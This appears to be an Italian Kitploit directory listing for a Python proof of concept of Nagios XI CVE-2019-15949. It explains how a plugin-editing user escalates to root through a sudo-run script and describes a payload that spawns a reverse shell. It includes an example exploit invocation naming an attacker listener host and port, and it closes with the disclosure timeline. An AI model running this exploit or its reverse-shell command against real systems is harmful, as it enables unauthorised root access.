Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Nagios-CVE-2019-15949-RCE — una PoC per la rce di Nagios CVE-2019-15949 in python | Kitploit
Strumenti/GitHubGitHub/plur1bu5/nagios-cve-2019-15949-rce
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingSviluppo Payload
GitHubplur1bu5/nagios-cve-2019-15949-rce

Nagios-CVE-2019-15949-RCE

una PoC per la rce di Nagios CVE-2019-15949 in python

Vedi Repository
15 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Nagios-CVE-2019-15949-RCE-Poc

un PoC Python per la CVE-2019-15949

Panoramica

Esiste una vulnerabilità in Nagios XI <= 5.6.5 che consente a un attaccante di sfruttare una RCE per elevare i privilegi a root. L'exploit richiede l'accesso al server come utente 'nagios', oppure l'accesso CCM tramite interfaccia web con permessi per gestire i plugin.

Dettagli

Lo script getprofile.sh, richiamato scaricando un profilo di sistema (profile.php?cmd=download), viene eseguito come root tramite una voce sudo senza password; lo script esegue l'eseguibile 'check_plugin' che è di proprietà dell'utente nagios. Un utente autenticato in Nagios XI con permessi per modificare i plugin, oppure l'utente 'nagios' sul server, può modificare l'eseguibile 'check_plugin' e inserire comandi dannosi eseguibili come root.

POC

È stato sviluppato un POC PHP che carica un payload che produce una reverse shell come root. Utilizzo:

python3 exploit.py tagetIp [ssl=false/true] username password Lhost lport

esempio:

python3 exploit.py 10.10.11.9 false nagiosadmin admin 10.10.11.14 4444

Divulgazione

Segnalata a Nagios il: 29 luglio 2019 Confermata da Nagios il: 29 luglio 2019 Corretta nella versione: 5.6.6 il: 20 agosto 2019 CVE assegnata il: 6 settembre 2019 (CVE-2019-15949 https://nvd.nist.gov/vuln/detail/CVE-2019-15949)

Scarica lo strumento